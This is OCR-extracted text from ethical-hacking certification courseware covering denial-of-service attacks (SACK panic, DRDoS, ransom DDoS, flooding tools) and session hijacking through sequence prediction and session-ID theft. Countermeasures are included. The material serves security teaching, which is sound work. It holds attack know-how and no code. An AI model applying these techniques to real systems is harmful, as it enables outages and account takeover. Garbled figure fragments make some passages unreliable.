This type of attack is quicker and more destructive than conventional DoS attacks. It works with a limited amount of resources, unlike a DDoS attack, in which attackers unleash a set of zombies onto a target. Attackers perform PDoS attacks by using a method known as the “pricking” of a system. In this method, the attacker sends emails, IRC chats, tweets, or videos with fraudulent content for hardware updates to the victim. The hardware updates are modified and corrupted with vulnerabilities or defective firmware. When the victim clicks on a link or pop-up window referring to the fraudulent hardware update, the victim installs it in their system. Consequently, the attacker attains complete control over the victim’s system. Sends email, IRC chats, tweets, posts, videos
ith fraudulent content for hardware updates
seen eeeeeeseeeeeeeeesauseaeeseseessaeeesssss>>
Attacker
Attacker gets access to victim’s computer
Victim (Malicious code is executed)
Figure 10.21: Permanent DoS attack
Module 10 Page 1457
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
TCP SACK Panic Attack TCP Selective Acknowledgment (SACK) panic attack is a remote attack vector in which attackers attempt to crash the target Linux machine by sending SACK packets with malformed maximum segment size (MSS). This attack exploits an integer overflow vulnerability in Linux Socket Buffer (SKB) that can lead to kernel panic. Generally, Linux systems use the TCP SACK method, where the sender is informed about the packets that are successfully acknowledged by the receiver. Therefore, the sender can retransmit only those packets that are not successfully acknowledged by the receiver. Here, Linux uses a linked-list data structure called socket buffer to store the data until it is acknowledged or received. The socket buffer can store a maximum of 17 segments. Then, the acknowledged packets are instantly deleted from the linked data structure. If buffer socket tries to store more than 17 segments, it can cause kernel panic. The TCP SACK panic attack leverages this vulnerability of the socket buffer. To achieve this, attackers send specially designed SACK packets in sequence to the target server by setting the MSS to the lowest value (48 bytes). The lowest MSS value increases the number of TCP segments that need to be retransmitted. This selective retransmission causes the socket buffer of the target server to exceed the limit of 17 segments. Thus, the socket buffer exceeds the limit and triggers integer overflow, causing a kernel panic that leads to DoS. As the vulnerability lies in the kernel stack, attackers can also perform this attack against containers and virtual machines. SACK
ket
Buffer
cectsavaveveseuereteny moeseeeavavavenesepe
overflows
SACK packet
cause kernel
Jan aeeeeenseaeceeeeeseneeeesensensenssesse Dy Attacker,
9
=]
2
fat)
Linux Server
panic
4
Legitimate Users
Figure 10.22: TCP SACK panic attack
Countermeasures =
Implement vulnerability patching
=
Implement a firewall rule to block requesting packets with the lowest MSS
Module 10 Page 1458
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Distributed Reflection Denial-of-Service (DRDoS) Attack
CE H
@ A distributed reflected denial-of-service attack (DRDOS), also known as a spoofed attack, involves theuse of multiple
intermediary and secondary machines that contribute to the actual DDoS attack against the target machine or application
@ Attackers launch this attack by sending requests to the intermediary hosts, which then redirect the requests to the secondary machines, which in turn reflect the attack traffic to the target Advantage © The primary target
seems to be directly attacked by the
secondary victim rather
t
than the actual attacker
@ Multiple intermediary
victim servers are used, which results in an
increase in attack bandwidth
__}
wy)
ie
‘g
.
Primary Target
a
Attacker
Intermediary Victims
Secondary Victims Copyright © by
Distributed Reflection Denial-of-Service (DRDoS) Attack A distributed reflection DoS (DRDoS) attack, also known as a “spoofed” attack, involves the use of multiple intermediary and secondary machines that contribute to a DDoS attack against a target machine vulnerability.
or
application.
A
DRDoS
attack
exploits
the
TCP
three-way
handshake
This attack involves an attacker machine, intermediary victims (zombies), secondary victims (reflectors), and a target machine. The attacker launches this attack by sending requests to the intermediary hosts, which in turn reflect the attack traffic to the target. The process of a DRDoS attack is as follows. First, the attacker commands the intermediary victims (zombies) to send a stream of packets (TCP SYN) with the primary target’s IP address as
the source IP address to other non-compromised machines (secondary victims or reflectors) in order to exhort them to establish a connection with the primary target. Consequently, the reflectors send a huge volume of traffic (SYN/ACK) to the primary target to establish a new connection with it because they believe the host requested it. The primary target discards the SYN/ACK packets received from the reflectors because they did not send the SYN packet. Meanwhile, the reflectors wait for the ACK response from the primary target. Assuming that
the packet was lost, the reflector machines resend SYN/ACK packets to the primary target to establish the connection, until a time-out occurs. In this manner, the target machine is flooded
with a heavy volume of traffic from the reflector machines. The combined bandwidth of these reflector machines overwhelms the target machine. A DRDOS attacker. primary multiple
attack is an intelligent attack because it is very difficult or even impossible to trace the Instead of the actual attacker, the secondary victims (reflectors) seem to attack the target directly. This attack is more effective than a typical DDoS attack because intermediary and secondary victims generate huge attack bandwidth.
Module 10 Page 1459
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Primary Target
Intermediary Victims
Secondary Victims
Figure 10.23: Distributed reflection DoS (DRDoS) attack
=
Countermeasures o
Turn off the Character Generator method
o
Download the latest updates and patches for servers
Module 10 Page 1460
Protocol (CHARGEN)
service to stop this attack
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
DDoS Extortion/Ransom DDoS (RDDoS) Attack
* (oteredtoa¢ronsom DOs
g,
(RDDoS). Herein, attackers threaten the target organizations with DDoS attackand insist them to paya specified ransom amount
@
o oO
Attackers send an email witha
the victim with a warning that the originalattack canbe
launchedat any moment
may also include @ Ransomnote
short messages threatening the victim about exposed vulnerabilities, assets, or data followed by instructionsfor
SI
—
ransom note alongwith
payment option, deadline, etc. to
CE H
BOe BOB -o o
OOo
BOB
a
Launches sample DDoS attack ii
gil
au
oa
Target Crganiation’s
he
Targeted Organization
ransom payment
DDoS Extortion/Ransom DDoS (RDDoS) Attack The DDoS extortion attack is also referred to as ransom DDoS (RDDoS). Herein, attackers threaten the target organizations with an DDoS attack and insist them to pay a specified ransom amount. The attacker either sends a ransom note or initiates a sample DDoS attack using a botnet on specific resources of the organizations to make them believe that the attack is real. Consequently, an email with a ransom or extortion note with the payment option, deadline, etc. is delivered to the victim and warns that the original attack can be launched at any moment. The ransom note may also include short messages or a series of messages threatening the victim with vulnerabilities, exposed assets, or data followed by instructions for ransom payment through digital currency. Generally, attackers fake these attacks claiming that they have high-capacity DDoS capability tools that can cause potential damage to the organization’s business.
Module 10 Page 1461
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
DDoS attack
sn
b
‘Ez
10 i010 oo O00
Uses botnet :
Attacker +
Launches sample
Target Organization’s Assets
the
|
Targeted Organization
4
Sends ransom note/email Figure 10.24: DDoS extortion attack
Countermeasures
=
Implement effective DDoS defense tools
=
Immediately report to the law enforcement agencies and security teams after receiving a ransom note
=
Frequently evaluate assets for risk tolerance
=
Implement service
Module 10 Page 1462
mitigation
strategies
such
as BGP/
DNS
swing
and
always-on
protection
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
DoS/DDoS Attack Tools
CE H
High Orbit Ion Cannon (HOIC)
DoS/DDoS Attack Tools XOIC
(http://anonhacktivism. blogspot.com)
HOIC carries out a DDoS to
attack any IP address witha user selected port anda user selected protocol
@ HULK (https://github.com) © Metasploit (https://www.metasploit.com)
Low Orbit Ion Cannon (LOIC)
Tor’s Hammer (https://sourceforge.net)
LOIC can be used on a target site to flood the server with TCP packets, UDP packets, or HTTP requests with the intention ofdisrupting the service of a particular host
Slowloris (https://github.com) ® PyLoris (https://sourceforge.net) httex://eourceforge net
$s Reserved. Reproduction
DoS/DDoS Attack Tools =
High Orbit lon Cannon (HOIC)
Source: https://sourceforge.net HOIC is a network stress and DoS/DDoS attack application written in BASIC language. It is designed to attack up to 256 target URLs simultaneously. It sends HTTP POST and GET requests to a computer that uses lulz-inspired GUls. Its features are summarized as follows: o
High-speed multi-threaded HTTP flooding
o
Simultaneous flooding of up to 256 websites
o
Built-in scripting system to allow the deployment of “boosters,” which are scripts designed to thwart DDoS countermeasures and increase DoS output
©
Portability to Linux/Mac with a few bug fixes
o
Ability to select the number of threads in an ongoing attack
o
Ability to throttle attacks individually with three settings: LOW, MEDIUM, and HIGH
Module 10 Page 1463
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
[IEE H.0.1¢, | v2.1.003 | Truth is on the side of the oppressed
Concepts of denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks Cs
> Concept of botnets along with the botnet ecosystem
> Various types of DoS/DDoS attacks > Various DoS/DDoS attack tools > Adetailed DDoS case study, namely, the DDoS Attack on Microsoft Azure »
We concluded with a detailed discussion on various countermeasures that are to be
employed to prevent DoS/DDoS attacks along with various hardware and software DoS/DDoS protection tools
Q
Inthe next module, we will discuss in detail how attackers, as well as ethical hackers and pen-testers, perform session hijackingto steal a valid session ID
Module Summary In this module, we discussed concepts related to denial-of-service (DoS) and distributed denialof-service (DDoS) attacks. We also discussed concepts related to botnets along with the botnet ecosystem. Moreover, we illustrated various DoS/DDoS attack tools and also discussed various types of DoS/DDoS attacks. Further, a detailed case study of
a DDoS attack on Microsoft Azure
was presented. We concluded with a detailed discussion on various countermeasures to prevent DoS/DDoS attacks, along with various hardware and software DoS/DDoS protection
tools. In the next module, we will discuss in detail how attackers, as well as ethical hackers and pen testers, perform session hijacking to steal a valid session ID.
Module 10 Page 1506
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
CiEH
EC-Council
Certified |) Ethical Hacker
MODULE 11 ——
SESSION HIJACKING ——
Wn menteyer 4
—
=
meme
ee
wre Hy a“
Be
‘
nee
ete
arg
acces
Seu
&
tetas
ce
ll
ow auto pedaing: 10px 0, transtorm trateZ(0)
em
GRRE
oF
Ome te at
Ae WE ome
—
sweet “TT aMataennies
masherght 0px
emuntiocnageos «Amat giiemmoenie mag
ovetion Ndden,
eaten tie ee nt
_———-s
ee
eal
*
*
te
cova onaeeas,
eens: toom oni
onetersereeer+O"wet eamat coats renes height auto
CC passing 10080
transtorm transiatez(0)
) sualed js Boews BU pro 1 natin an"togs border-bottom 2px sod
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
© LO#01: Summarize Session Hijacking Concepts
o
LEARNING
© LO#02: Explain Application-Level Session Hijacking
OBJECTIVES
LO#04: Use Session Hijacking Tools LO#05: Explain Session Hijacking Countermeasures
© LO#03: Explain Network-Level Session Hijacking
Strictly Prohibited
Learning Objectives Session hijacking allows attackers to take over an active session by bypassing the authentication process. Thereafter, they can perform any action on the hijacked system. At the end of this module, you will be able to do the following: =
Describe session hijacking concepts
=
Perform application-level session hijacking
=
Perform network-level session hijacking
=
Use different session hijacking tools
=
Apply session hijacking countermeasures
Module 11 Page 1509
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
LO#01: Summarize Session Hijacking Concepts
Session Hijacking Concepts Familiarization with basic concepts related to session hijacking is important to attain a comprehensive understanding. This section explains what session hijacking is as well as the reasons why session hijacking succeeds. It also discusses the session hijacking process, packet analysis of a local session hijack, types of session hijacking, session hijacking in an Open Systems Interconnection (OSI) model, and differences between spoofing and hijacking.
Module 11 Page 1510
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
What is Session Hijacking? @
Session hijacking refers to an attack in which an attacker seizes control of a valid TCP communication
computers
} @
{
¢ iE H Credential Transmission
session between two
SessionID Prediction Session Desynchronization
| Start injecting packets to the target server
a mE | Take over the session
° | Break the connection to the victim’seprachire
=)
Monitor | Monitorthe flow of packets and predict the sequence number Sniff | Place yourself between the victim and the target (you must be able to sniff the network)
Figure 11.2: Session hijacking process
Module 11 Page 1515
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
Session hijacking can be divided into three broad phases. Tracking the connection The attacker uses a network sniffer to track a victim and host or uses a tool such as Nmap to scan the network for a target with a TCP sequence that is easy to predict. After identifying a victim, the attacker captures the sequence and acknowledgment numbers of the victim because TCP checks these numbers. The attacker then uses these numbers to construct packets. Desynchronizing the connection A desynchronized state occurs when a connection between a target and host is established, or stable with no data transmission or the server’s sequence number is not equal to the client’s acknowledgment number, or vice versa. To desynchronize the connection between the target and host, the attacker must change the sequence number or acknowledgment number (SEQ/ACK) of the server. For this purpose, the attacker sends null data to the server; consequently, the server’s SEQ/ACK numbers advance, while the target machine does not register the increment. For example, before desynchronization, the attacker monitors the session without any interference, following which they send a large amount of null data to the server. These data change the ACK number on the server without affecting anything else, thereby desynchronizing the server and target.
Another approach is to send a reset flag to the server to break the connection on the server side. Ideally, this occurs in the early setup stage of the connection. The attacker’s goal is to break the connection on the server side and create a new connection with a different sequence number. The attacker waits for a SYN/ACK packet from the server to the host. On detecting a packet, the attacker immediately sends an RST packet and a SYN packet with identical parameters, such as a port number with a different sequence number, to the server. The server, on receiving the RST packet, closes the connection with the target and initiates another one based on the SYN packet but with a different sequence number on the same port. After opening a new connection, the server sends a SYN/ACK packet to the target for acknowledgement. The attacker detects (but does not intercept) this packet and sends an ACK packet to the server. Now, the server is in the established state. The aim is to keep the target conversant and ensure that it switches to the established state on receiving the first SYN/ACK packet from the server. Consequently, both the server and target are desynchronized but in an established state. An attacker can also use a FIN flag, but this will make the server respond with an ACK packet, thus revealing the attack through an ACK storm. The attack is revealed because of a flaw in this method of hijacking a TCP connection. While receiving an unacceptable packet, the host acknowledges it by sending the expected sequence number. This unacceptable packet generates an ACK packet, thereby creating an endless loop for every data packet. The mismatch in SEQ/ACK numbers results in excess network traffic
Module 11 Page 1516
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
with both the server and these packets carry no However, because TCP conversation between the An attacker can add target host. Without keeping their identity ensure that the server =
target attempting to verify the correct sequence. Because data, retransmission does not occur if the packet is lost. uses IP, the loss of a single packet ends the unwanted server and target.
a desynchronizing stage to the hijack sequence to deceive the desynchronizing, the attacker injects data into the server while hidden by spoofing an IP address. However, the attacker should responds to the target host as well.
Injecting the attacker's packet Once the attacker has interrupted the connection between the server and target, they can either inject data into the network or actively participate as the man in the middle, passing data from the target to the server and vice-versa while reading and injecting data at will.
Module 11 Page 1517
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
Packet Analysis of a Local Session Hijack
¢ EH
SYN
User
.
ACK 1501
Note: Before the user
sends the next data packet, the attacker predicts the next
sequence number and ++} [Bf sends the data to the server; this leads to the ACK 1440 establishment of the
connection between the
ssc [Ip attacker and the server Copyright © by
Packet Analysis of a Local Session Hijack Session hijacking involves high-level attack vectors, which affect many systems. transmitting data by many systems that establish LAN or Internet connections. a connection between two systems and for the successful transmission of systems should perform a three-way handshake. Session hijacking involves the this three-way handshake method to take control over the session.
TCP is used for For establishing data, the two exploitation of
To conduct a session hijacking attack, the attacker performs three activities: =
Tracking of a session
=
Desynchronization of the session
=
Injection of commands during the session
By sniffing network traffic, an attacker can monitor or track a session. The next step in session hijacking is to desynchronize the session. It is easy to accomplish this attack if the attacker knows the next sequence number (NSN) used by the client. A session can be hijacked by using that sequence number before the client uses it. There are two possibilities to determine sequence numbers: one is to sniff the traffic, find an ACK packet, and then determine the NSN based on the ACK packet. The other is to transmit data with guessed sequence numbers, which is not a reliable method. If the attacker can access the network and sniff the TCP session, they can easily determine the sequence number. This type of session hijacking is called "local session hijacking.”
Module 11 Page 1518
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
The below figure shows the packet analysis of a local session hijack. SYN
DATA=128
ACK (Clt SEQ + DATA) 1329
& |Attacker
Figure 11.3: Packet analysis of a local session hijack
According to above figure, the next expected sequence number is 1420. If the attacker transmits that packet sequence number before the user does, they can desynchronize the connection between the user and server. If the attacker sent the data with the expected sequence number before the user could, the server would be synchronized with the attacker. This leads to the establishment of a connection between the attacker and server. Then, the server would drop the data sent by the user with the correct sequence number, believing it to be a resent packet. The user is unaware of the attacker’s action and may resend the data packet because the user does not receive an ACK for their TCP packet. However, the server would drop all the packets resent by the user. Thus, the local session hijacking attack is successfully completed.
Module 11 Page 1519
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
Types of Session Hijacking Passive
Active
‘@
Ina
CE H
passive attack, an attacker hijacks a session but sits back, watches, and
records all the traffic in that session
‘@_Inan active attack, an attacker finds an active session and seizes control of it
Attacker
Victim
Types of Session Hijacking Session hijacking can be either active or passive, depending on the degree of involvement of the attacker. The essential difference between an active and passive hijack is that while an active hijack takes over an existing session, a passive hijack monitors an ongoing session. =
Passive Session Hijacking
In a passive attack, after hijacking a session, an attacker only observes and records all the traffic during the session. A passive attack uses sniffers on the network, allowing attackers to obtain information such as user IDs and passwords. The attacker can later use this information to log in as a valid user and enjoy the user’s privileges. Password sniffing is the simplest attack to obtain raw access to a network. Countering this attack involves methods that range from identification schemes (for example, one-time password systems such as S/KEY) to ticketing identification (for example, Kerberos). These techniques help in protecting data from sniffing attacks, but they cannot protect against active attacks if the data are unencrypted or do not carry a digital signature. =
Active Session Hijacking In an active attack, an attacker takes over an existing session either by breaking the connection on one side of the conversation or by actively participating. An example of an active attack is a man-in-the-middle (MITM) attack. To perform a successful MITM attack, the attacker must guess the sequence number before the target responds to the server. On most current networks, sequence-number prediction does not work, because operating-system (OS) vendors use random values for the initial sequence number, which makes it difficult to predict sequence numbers.
Module 11 Page 1520
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
Attacker Figure 11.4: Attacker sniffing a victim’s traffic
Module 11 Page 1521
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
Session Hijacking in OSI Model
Network-Level
Hijacking
Application-Level
Hijacking
|
‘@
CE H
Network-level hijacking can be defined as the interception of packets during the transmission between a client and
the server in a TCP or UDP session
‘@
Application-level hijacking refers to gaining control over the
HTTP’s user session by obtaining the session IDs
Copyright © by
Session Hijacking in OSI Model There are two levels of session hijacking in the OSI model: the network-level and applicationlevel. =
Network-Level Hijacking Network-level hijacking is the interception of packets during the transmission between a client and server in a TCP/User Datagram Protocol (UDP) session. A successful attack provides the attacker with crucial information, which can be further used to attack application-level sessions. Attackers most likely perform network-level hijacking because they do not need to modify the attack on a per-web-application basis. This attack focuses on the data flow of the protocol shared across all web applications.
=
Application-Level Hijacking Application-level hijacking involves gaining control over the Hypertext Transfer Protocol (HTTP) user session by obtaining the session IDs. At the application-level, the attacker gains control of an existing session and can create new unauthorized sessions by using stolen data. In general, both occur together, depending on the system being attacked.
Module 11 Page 1522
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
Spoofing vs. Hijacking Spoofing Attack
Hijacking
@ Anattacker pretendsto be another user or
@ Session hijacking is the process of seizing control
‘@
‘@
machine (victim) to gain access
of an existing active session
The attacker does not seize control of an existing
active session; instead, he or she initiates a new
session using the victim's stolen credentials
James (victim)
Server
The attacker relies on the legitimate user to create
a connection and authenticate
S
James logs on to the
' james
(Victim)
Predicts t sequence and ki
Server
James’ connect
John (Attacker)
Spoofing vs. Hijacking In blind hijacking, an attacker predicts the sequence numbers that a victim host sends to create a connection that appears to originate from the host or a blind spoof. To understand blind hijacking, it is important to understand sequence-number prediction. TCP sequence numbers, which are unique per byte in a TCP session, provide flow control and data integrity. TCP segments provide the initial sequence number (ISN) as a part of each segment header. ISNs do not start at zero for each session. As part of the handshake process, each participant needs to state the ISN, and bytes are numbered sequentially from that point. Blind session hijacking relies on the attacker’s ability to predict or guess sequence numbers. An attacker is unable to spoof a trusted host on a different network and observe the reply packets because no route exists for the packets to return to the attacker’s IP address. Moreover, the attacker is unable to resort to Address Resolution Protocol (ARP) cache poisoning because routers do not broadcast ARP across the Internet. Because the attacker is unable to observe the replies,
he/she
must
anticipate
the
responses
from
the
victim
and
prevent
the
host
from
sending a TCP/RST packet to the victim. The attacker predicts sequence numbers that the remote host expects from the victim and then hijacks the communication. This method is useful when exploiting trust relationships between users and remote machines. In a spoofing attack, an attacker pretends to be another user or machine (victim) to gain access. Instead of taking over an existing active session, the attacker initiates a new session using the victim’s stolen credentials. Simple IP spoofing is easy to perform and is useful in various attack methods. To create new raw packets, the attacker must have root access on the machine. However, to establish a spoofed connection using this session hijacking technique, an attacker must know the sequence numbers used by a target machine. IP spoofing forces the attacker to
Module 11 Page 1523
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
forecast the NSN. When an attacker uses blind hijacking to send a command, they cannot view the response. In the case of IP spoofing without a session hijack, guessing the sequence number is unnecessary because no currently open session exists with that IP address. In a session hijack, the traffic returns to the attacker only if source routing is used. Source routing is a process that allows the sender to specify the route to be taken by an IP packet to the destination. The attacker performs source routing and then sniffs the traffic as it passes by the attacker. In session spoofing, captured authentication credentials are used to establish a session. In contrast, active hijacking eclipses a pre-existing session. As a result of this attack, a legitimate user may lose access or the normal functionality of their established Telnet session because an attacker hijacks the session and acts with the user’s privileges. Because most authentication mechanisms are enforced only at the initiation of a session, the attacker can gain access to a target machine without authentication while a session is in progress. Another method is to use source routed IP packets. This type of MITM attack allows an attacker to become a part of the target—host conversation by deceptively guiding IP packets to pass through their system. Session hijacking is the process of taking over an existing active session. An attacker relies on a legitimate user to make a connection and authenticate. Session hijacking is more difficult than IP address spoofing. In session hijacking, John (an attacker) would seek to insert himself into a session that James (a legitimate user) already had set up with \\Mail. John would wait until James establishes a session, displace James from the established session by some means, such as a DoS attack, and then pick up the session as though he were James. Subsequently, John would send a scripted set of packets to \\Mail and observe the responses. For this purpose, John needs to know the sequence number in use when he hijacked the session. To calculate the sequence number, he must know the ISN and the number of packets involved in the exchange
process.
Successful session hijacking is difficult without the use of known tools and is only possible when several factors are under the attacker’s control. Knowledge of the ISN is the least of John’s challenges. For instance, John needs a method to displace James from the active session as well as a method to know the exact status of James’s session at the moment that James is displaced. Both these tasks require John to have far more knowledge and control over the session than would normally be possible. However, IP address spoofing attacks can only be successful if an attacker uses IP addresses for authentication. They cannot perform IP address spoofing or session hijacking if per-packet integrity checking is executed. In the same manner, IP address spoofing or session hijacking is not possible if the session uses encryption methods such as Secure Sockets Layer (SSL) or Pointto-Point Tunneling Protocol (PPTP). Consequently, the attacker cannot participate in the key exchange.
Module 11 Page 1524
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
7
James
Server
(Victim)
John (Attacker) Figure 11.5: Spoofing attack
James logs on to the
ye
James ve
(Victim)
server with his credentials
Perrrerrrrrr iret titty
seeeeeeeeeeeeeeeses
D>
7
Predicts th sequence and ki
Server
James’ connect!
John (Attacker) Figure 11.6: Session hijacking
In summary, the hijacking of non-encrypted TCP communications requires encrypted session-oriented traffic, the ability to recognize TCP sequence the next sequence number (NSN) can be predicted, and the ability to access control (MAC) or IP address to receive communications that are
the presence of nonnumbers from which spoof a host’s media not destined for the
attacker’s host. If the attacker is on the local segment, they can sniff and predict the ISN + 1 number and route the traffic back to them by poisoning the ARP caches on the two legitimate hosts participating in the session.
Module 11 Page 1525
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
C/EH
LO#02: Explain Application-Level Session Hijacking
Copyright © by
Al Rights Reserved. Reproductionis Strict Prohibited
Application-Level Session Hijacking
CE H
@ Ina session hijacking attack, a session token is stolen or a valid session token is predicted to gain unauthorized access to the web server A session token can be compromised in various ways
[11 |
Session sniffing
Predictable session token
Man-in-the-middle attack
Man-in-the-browser attack
Cross-site scripting (XSS) attack
Cross-site request forgery attack
Session replay attack
Session fixation attack
CRIME attack
Forbidden attack
Session donation attack
PetitPotam hijacking
\exerved. Reproduction st
Application-Level Session Hijacking This section discusses application-level session hijacking and various methods to compromise the session token, such as session sniffing and the use of predictable session tokens. In application-level session hijacking, an attacker steals or predicts a valid session token to gain unauthorized access to a web server or create a new unauthorized session. Usually, networklevel and application-level session hijacking occur together because a successful network-level Module 11 Page 1526
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
session hijack provides an attacker with ample information to perform application-level session hijacking. Application-level session hijacking relies on HTTP sessions. An attacker implements various techniques such as stealing, guessing, and brute forcing to obtain a valid session ID, which helps in acquiring control over a valid user’s session while it is in
progress.
Stealing: Attackers use different techniques to steal session IDs. An attacker can steal the session key through physical access by, for example, acquiring the files containing session IDs or memory contents of either the user’s system or the server. The attacker can also use sniffing tools such as Wireshark or Riverbed Packet Analyzer Plus to sniff the traffic between the client and server to extract the session IDs from the packets. Guessing: An attacker attempts to guess the session IDs by observing session variables. In the case of session hijacking, the range of session ID values that can be guessed is limited. Thus, guessing techniques are effective only when servers use weak or flawed session-ID generation mechanisms.
Brute forcing: In the brute-force technique, an attacker obtains session IDs by attempting all possible permutations of session ID values until finding one that works. An attacker using a digital subscriber line (DSL) can generate up to 1,000 session IDs per second. This technique is most useful when the algorithm that produces session IDs is non-random.
Attacker
Server Figure 11.7: Brute-forcing attack on the session ID of a user
As shown in the above figure, a legitimate user connects to a server with session ID VW30422101522507. Employing various combinations such as VW30422101518909 and VW30422101520803, an attacker attempts to brute force the session ID in the hope of eventually arriving at the correct session ID. Once the attacker obtains the correct session ID, they gain complete access to the user’s data and can perform operations on behalf of the legitimate user. Note: A session ID brute-forcing attack is known as a predicted range of values for a session ID is very small.
Module 11 Page 1527
session prediction attack if the
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
A session token can be compromised in various ways: =
Session sniffing
=
Session replay attack
=
Predictable session token
=
Session fixation attack
=
Man-in-the-middle (MITM) attack
=
CRIME attack
=
Man-in-the-browser attack
=
Forbidden attack
=
Cross-site scripting (XSS) attack
=
Session donation attack
=
Cross-site request forgery attack
=
PetitPotam hijacking
Module 11 Page 1528
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
Compromising Session IDs using Sniffing and by Predicting Session Token
cE H mle sae
Compromising Session IDs using Sniffing
Compromising Session IDs by Predicting Session Token
@ An attacker uses a sniffer to capture a valid session token or session ID
@ Attackers can predict session IDs generated by weak algorithms and impersonate a website user
‘The attacker then uses the valid token session to
{@ Attackers analyze variable sections of session IDs to
gain unauthorized access to the web server
determine a pattern
Session ID ‘=ACF303SF216AAEFC
@ The analysis is performed manually or using various cryptanalytic tools ©@
Attackers collect a high number of simultaneous
session IDs to gather samples in the same time window and keep the variable constant
‘Attacker
Compromising Session IDs Using Sniffing A web
server
identifies a user’s connection
through
a unique
session
ID (also known
as a
session token). The web server sends a session token to the client browser after the successful authentication of client login. Usually, a session token comprises a string of variable width that is useful in various ways, such as in the header of an HTTP requisition (cookie), in a URL, or in the body of an HTTP requisition. An attacker uses packet sniffing tools such as Wireshark and Riverbed Packet Analyzer Plus to intercept the HTTP traffic between a victim and web server. The attacker then analyzes the data in the captured packets to identify valuable information such as session IDs and passwords. Once the session ID is determined, the attacker masquerades as the victim and sends the
session ID to the web server before the victim does. The attacker uses the valid token session to gain unauthorized access to the web server. In this manner, the attacker takes control over an existing legitimate session. Session ID =ACF303SF216AAEFC
Victim
Attacker sniffs £ a legitimate ©
7
Web Server
Figure 11.8: Prediction of session ID by sniffing
Module 11 Page 1529
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Session Hijacking
Exam 312-50 Certified Ethical Hacker
